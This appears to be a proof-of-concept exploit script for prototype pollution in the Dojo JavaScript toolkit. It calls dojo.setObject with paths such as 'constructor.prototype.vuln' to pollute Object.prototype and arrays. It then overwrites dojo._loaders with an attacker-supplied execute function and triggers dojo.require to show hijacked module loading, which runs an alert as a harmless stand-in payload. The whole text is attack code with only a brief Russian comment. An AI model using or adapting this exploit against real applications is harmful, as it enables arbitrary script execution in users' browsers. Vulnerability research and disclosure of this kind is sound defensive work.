dojo.setObject("proto.vuln", "polluted!", {});
console.log("Test 1:", {}.vuln);

dojo.setObject("foo.proto.vuln", "polluted!", {});
console.log("Test 2:", {}.vuln);

const arr = [];
dojo.setObject("proto.vuln", "polluted!", arr);
console.log("Array test:", [].vuln);

Object.prototype.vuln = "manual polluted!";
console.log("Manual test:", {}.vuln);

const obj = {};
console.log("Before:", obj.constructor);

dojo.setObject("constructor.prototype.vuln", "polluted!", obj);

console.log("After:", obj.constructor);
console.log("Constructor prototype:", obj.constructor.prototype);
console.log("Object prototype:", Object.getPrototypeOf({}));

dojo.setObject("_loaders.0", {
  dynamic: true,
  execute: function() {
    alert("Loader hijacked!");
  }
}, dojo);

// Инициируем загрузку
dojo.require("some.module");
